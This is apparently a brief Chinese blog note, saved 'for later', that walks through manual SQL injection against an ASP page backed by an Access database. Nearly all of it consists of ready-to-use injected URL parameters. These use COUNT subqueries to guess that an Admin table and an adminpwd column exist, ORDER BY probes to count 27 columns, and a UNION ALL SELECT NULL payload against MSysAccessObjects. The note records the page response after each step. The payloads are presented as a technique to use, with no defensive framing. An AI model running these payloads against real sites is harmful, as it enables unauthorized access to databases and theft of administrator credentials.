本文介绍了一种通过SQL注入技术猜测数据库表名、字段名及表中字段数量的方法,包括验证表是否存在、字段是否存在及字段个数的探测过程。
方法从网上看来的,记下来以后看。
1,猜表名:
abc.asp?id=12 and 0 <= (select COUNT(*) from [User])
错误结果显示米有User表。
abc.asp?id=12 and 0 <= (select COUNT(*) from [Admin])
加载。。。,说明存在表Admin。
2,猜字段名:
abc.asp?id=12 and 0 <= (select COUNT(id) from [Admin])
加载。。。,说明表Admin有字段id。
abc.asp?id=12 and 0 <= (select COUNT(password) from [Admin])
abc.asp?id=12 and 0 <= (select COUNT(adminpwd) from [Admin])
加载。。。,说明表Admin有字段adminpwd。
3,查看字段个数
abc.asp?id=12 order by 10
加载
abc.asp?id=12 order by 20
加载
abc.asp?id=12 order by 27
加载
abc.asp?id=12 order by 28
说明表有27个字段
abc.asp?id=12 uNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,null,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%00
加载。。。。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
